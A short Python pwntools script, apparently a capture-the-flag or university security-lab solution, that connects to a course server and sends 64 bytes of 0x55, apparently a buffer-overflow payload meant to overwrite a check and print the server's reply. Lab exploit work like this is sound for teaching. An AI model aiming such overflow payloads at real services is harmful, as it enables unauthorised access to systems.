11 lines
179 B
Python
11 lines
179 B
Python
from pwn import *
|
|
|
|
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
|
PORT = 25161
|
|
|
|
conn = remote(HOST, PORT)
|
|
conn.recvuntil(b":")
|
|
pl = b"\x55"*(64)
|
|
conn.send(pl)
|
|
print(conn.recvline())
|